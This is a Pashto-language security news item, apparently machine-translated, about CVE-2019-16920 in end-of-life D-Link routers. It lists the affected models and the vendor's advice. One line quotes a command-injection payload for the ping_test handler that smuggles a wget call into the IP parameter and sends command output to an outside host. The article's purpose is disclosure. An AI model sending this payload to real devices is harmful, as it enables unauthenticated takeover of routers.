په D-Link راوټرونو کې له لرې څخه د ګټې اخیستنې وړ زیان

د D-Link بې سیم راوټرونو کې پیژندل شوی خطرناک زیانمنتیا (CVE-2019-16920)، کوم چې تاسو ته اجازه درکوي چې د "ping_test" هینډلر ته د ځانګړې غوښتنې په لیږلو سره د وسیلې اړخ ته په لرې ډول کوډ اجرا کړئ، پرته له تصدیق څخه د لاسرسي وړ.

په زړه پورې ، د فرم ویئر پراختیا کونکو په وینا ، د "ping_test" زنګ باید یوازې د تصدیق وروسته اجرا شي ، مګر په حقیقت کې دا په هر حالت کې ویل کیږي ، پرته لدې چې ویب انٹرفیس ته ننوتل. په ځانګړې توګه، کله چې apply_sec.cgi سکریپټ ته لاسرسی ومومئ او د "action=ping_test" پیرامیټر تیر کړئ، سکریپټ د تصدیق پاڼې ته لیږدول کیږي، مګر په ورته وخت کې د ping_test سره تړلی عمل ترسره کوي. د کوډ اجرا کولو لپاره ، یو بل زیان پخپله په ping_test کې کارول شوی و ، کوم چې د ازموینې لپاره لیږل شوي IP پتې سموالي په سمه توګه چیک کولو پرته د ping افادیت ته زنګ وهي. د مثال په توګه، د ویجټ افادیت ته زنګ وهلو لپاره او د "ایکو 1234" کمانډ پایلې بهرني کوربه ته لیږدولو لپاره، یوازې د "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" پیرامیټر مشخص کړئ. test.test/؟$( echo 1234)"

په D-Link راوټرونو کې له لرې څخه د ګټې اخیستنې وړ زیان

د زیان مننې شتون په رسمي ډول په لاندې ماډلونو کې تایید شوی:

  • DIR-655 د فرم ویئر 3.02b05 یا زاړه سره؛
  • DIR-866L د فرم ویئر 1.03b04 یا زاړه سره؛
  • DIR-1565 د فرم ویئر 1.01 یا زاړه سره؛
  • DIR-652 (د ستونزمن فرم ویئر نسخو په اړه هیڅ معلومات ندي ورکړل شوي)

د دې ماډلونو لپاره د ملاتړ موده لا دمخه پای ته رسیدلې ، نو D-Link وویل، کوم چې د زیان مننې له مینځه وړو لپاره به د دوی لپاره تازه معلومات نه خپروي ، د دوی کارولو وړاندیز نه کوي او د نوي وسیلو سره یې ځای په ځای کولو مشوره ورکوي. د امنیتي حل په توګه، تاسو کولی شئ ویب انٹرفیس ته لاسرسی یوازې د باور وړ IP پتې ته محدود کړئ.

وروسته معلومه شوه چې زیانمنتیا هم وه اغیزه کوي ماډلونه DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 او DIR-825، د تازه معلوماتو خپرولو لپاره پالن لري چې تر اوسه معلومه نه ده.

سرچینه: opennet.ru

Add a comment